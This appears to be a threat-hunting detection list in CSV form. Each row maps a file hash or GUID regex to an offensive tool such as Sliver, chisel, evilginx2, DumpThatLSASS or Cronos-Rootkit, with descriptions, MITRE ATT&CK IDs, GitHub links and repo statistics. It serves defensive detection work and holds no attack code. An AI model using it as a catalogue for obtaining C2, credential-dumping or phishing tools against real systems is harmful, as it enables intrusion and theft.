"*92f28921ca0db8a0c7c1a4e18a9e9dea53fdbd902b3d3ad67444f59a21a96d5c*",".{0,1000}92f28921ca0db8a0c7c1a4e18a9e9dea53fdbd902b3d3ad67444f59a21a96d5c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*932e9575f1cda389162af613cfad2ec48f9fedd7039e09aec2b349ca2a9f663e*",".{0,1000}932e9575f1cda389162af613cfad2ec48f9fedd7039e09aec2b349ca2a9f663e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*933a32bee8a72a28653b56cb9b013f67da6510d4ad10c21333a6e930d385fb82*",".{0,1000}933a32bee8a72a28653b56cb9b013f67da6510d4ad10c21333a6e930d385fb82.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*934cdd2196c8892b2587ae94b5ae02e3c51ebf73c4c91b43b081d8add9ea381a*",".{0,1000}934cdd2196c8892b2587ae94b5ae02e3c51ebf73c4c91b43b081d8add9ea381a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*93642234b0a16f0af2ebc99eb13287ab9b518bc5784358ee7d8166d3ae254560*",".{0,1000}93642234b0a16f0af2ebc99eb13287ab9b518bc5784358ee7d8166d3ae254560.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9372fc352f24f6f58fe28bd7d0ff4cdc3a384275c7ddd6f76c4fa40eea0a94b2*",".{0,1000}9372fc352f24f6f58fe28bd7d0ff4cdc3a384275c7ddd6f76c4fa40eea0a94b2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff*",".{0,1000}9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9399f2fe7c63989641f911a519930e9139ff4987c0bdaee56c25d68c4c64a63b*",".{0,1000}9399f2fe7c63989641f911a519930e9139ff4987c0bdaee56c25d68c4c64a63b.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*93b20a7961c9986baf181d1a1635b33b87735f75d046c6dcdd5d412a55832d6f*",".{0,1000}93b20a7961c9986baf181d1a1635b33b87735f75d046c6dcdd5d412a55832d6f.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*93bd4c92a4470333efab88a00bfec4c3fc64318fc8ce0ffb9187ea54a9acf243*",".{0,1000}93bd4c92a4470333efab88a00bfec4c3fc64318fc8ce0ffb9187ea54a9acf243.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*93c574a4f1608cb5ecf7173e42d35c5a670c58c635e6a90252cd9a102d24e260*",".{0,1000}93c574a4f1608cb5ecf7173e42d35c5a670c58c635e6a90252cd9a102d24e260.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*93d1405dfa8765ab3ec43d1912e65ae89b8b8d06ddbc570f8cae0ca46dbf5007*",".{0,1000}93d1405dfa8765ab3ec43d1912e65ae89b8b8d06ddbc570f8cae0ca46dbf5007.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*93e193e3081c5ac744e40c81c32992ef449c855752d8b10f6483a969950572a4*",".{0,1000}93e193e3081c5ac744e40c81c32992ef449c855752d8b10f6483a969950572a4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*93f5019c2c7b3a946f3a137fa1754576400c126f24b424076c9801e8f67441fd*",".{0,1000}93f5019c2c7b3a946f3a137fa1754576400c126f24b424076c9801e8f67441fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*940B1177-2B8C-48A2-A8E7-BF4E8E80C60F*",".{0,1000}940B1177\-2B8C\-48A2\-A8E7\-BF4E8E80C60F.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*9421b13f1c89ded77d1964b6e7032e300360063fc9d79b4afd432533038725d4*",".{0,1000}9421b13f1c89ded77d1964b6e7032e300360063fc9d79b4afd432533038725d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9440cc0475d27f1b73944b69fc843ef2ef2e8fc407d1400502c49ee20291121b*",".{0,1000}9440cc0475d27f1b73944b69fc843ef2ef2e8fc407d1400502c49ee20291121b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*945efb5ef7d46cf1e4f5383fb158ea5cd63d42214ea44abd73592f6ceeb6cf33*",".{0,1000}945efb5ef7d46cf1e4f5383fb158ea5cd63d42214ea44abd73592f6ceeb6cf33.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*946D24E4-201B-4D51-AF9A-3190266E0E1B*",".{0,1000}946D24E4\-201B\-4D51\-AF9A\-3190266E0E1B.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*948f609d447e622613e2b02500ec333867849aee711dcb146be75ddee92dd02e*",".{0,1000}948f609d447e622613e2b02500ec333867849aee711dcb146be75ddee92dd02e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*94a12554419e378df4acc76c0725d141738ecf1f991c74445d1e23c655278747*",".{0,1000}94a12554419e378df4acc76c0725d141738ecf1f991c74445d1e23c655278747.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*94AEDCE4-D4A2-45DB-B98E-860EE6BE8385*",".{0,1000}94AEDCE4\-D4A2\-45DB\-B98E\-860EE6BE8385.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*94beb306747153d234f7da1d2c996cab68e19620e87d9f348979886910eb09cb*",".{0,1000}94beb306747153d234f7da1d2c996cab68e19620e87d9f348979886910eb09cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*94dc145b517036213443d4057d400296d40ffdcd50ba63f5304796060790c8a3*",".{0,1000}94dc145b517036213443d4057d400296d40ffdcd50ba63f5304796060790c8a3.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*950bb21485106b135bbe1e28b8b7f74652cadeb9ae8c68342f0ee8c91ce8306c*",".{0,1000}950bb21485106b135bbe1e28b8b7f74652cadeb9ae8c68342f0ee8c91ce8306c.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*950fd036a54ec99522231614375eff9aaa6dfff0414090b24b0f394c7810e408*",".{0,1000}950fd036a54ec99522231614375eff9aaa6dfff0414090b24b0f394c7810e408.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9521c213fdd6e0b58f1288a67dbbc2b178233e2d46d09feb8da1727520340d48*",".{0,1000}9521c213fdd6e0b58f1288a67dbbc2b178233e2d46d09feb8da1727520340d48.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*952c94381c139e9d0b212d7f854ad261827e6694eac3e17b2c606ff9f54a7e91*",".{0,1000}952c94381c139e9d0b212d7f854ad261827e6694eac3e17b2c606ff9f54a7e91.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*95494fd45d6bc11bc49f1e41af352f896b7ada9c5eadeb029d6463def8bd60cd*",".{0,1000}95494fd45d6bc11bc49f1e41af352f896b7ada9c5eadeb029d6463def8bd60cd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*95650a1f11040590015b106d08d5453b09acdb02484ddce02f929953ca8a7149*",".{0,1000}95650a1f11040590015b106d08d5453b09acdb02484ddce02f929953ca8a7149.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18*",".{0,1000}9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*957e5ed833379f0a82f9424055e8b4159bbd205c291b1210bccf689cdfb22d0f*",".{0,1000}957e5ed833379f0a82f9424055e8b4159bbd205c291b1210bccf689cdfb22d0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*95A40D7C-F3F7-4C45-8C5A-D384DE50B6C9*",".{0,1000}95A40D7C\-F3F7\-4C45\-8C5A\-D384DE50B6C9.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","content","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*95BC2C38-1FBE-4AF1-967E-BC133250C4D4*",".{0,1000}95BC2C38\-1FBE\-4AF1\-967E\-BC133250C4D4.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*95d19ae58bbd6b38b4988fae5c7b514c8451a15e940f1392bcf1f93374364054*",".{0,1000}95d19ae58bbd6b38b4988fae5c7b514c8451a15e940f1392bcf1f93374364054.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","file_hash","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*95dd437c805fb71cb3cda5f20ad9b212c44f14dc09194867125acb289af6301b*",".{0,1000}95dd437c805fb71cb3cda5f20ad9b212c44f14dc09194867125acb289af6301b.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*961281a6a9502553f68b61f2679a74dfd059fab22328e6f8dcce70c9dbfde0e2*",".{0,1000}961281a6a9502553f68b61f2679a74dfd059fab22328e6f8dcce70c9dbfde0e2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*96da4a94f18030d87385e954b03d72c51aa2209acc07fd947ef83b89443c905e*",".{0,1000}96da4a94f18030d87385e954b03d72c51aa2209acc07fd947ef83b89443c905e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*971193eea29201f09ab21c42b5d03c63a5509d81b42158c2cf2b81bc8851ee8b*",".{0,1000}971193eea29201f09ab21c42b5d03c63a5509d81b42158c2cf2b81bc8851ee8b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*971f7d595c07fa302de6843e85ae22c771bc23a790f4092b5e6cd62fac985ab0*",".{0,1000}971f7d595c07fa302de6843e85ae22c771bc23a790f4092b5e6cd62fac985ab0.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*9748cdfecb95fd7bb1706a566e79d3fccb1418bbb4307f7a7a1de1809db83afe*",".{0,1000}9748cdfecb95fd7bb1706a566e79d3fccb1418bbb4307f7a7a1de1809db83afe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*97499fbdae8e2c952f21da5834caf06b11dcc28d74b034b509bd174f3d1f1739*",".{0,1000}97499fbdae8e2c952f21da5834caf06b11dcc28d74b034b509bd174f3d1f1739.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*9786E418-6C4A-471D-97C0-8B5F2ED524C8*",".{0,1000}9786E418\-6C4A\-471D\-97C0\-8B5F2ED524C8.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - 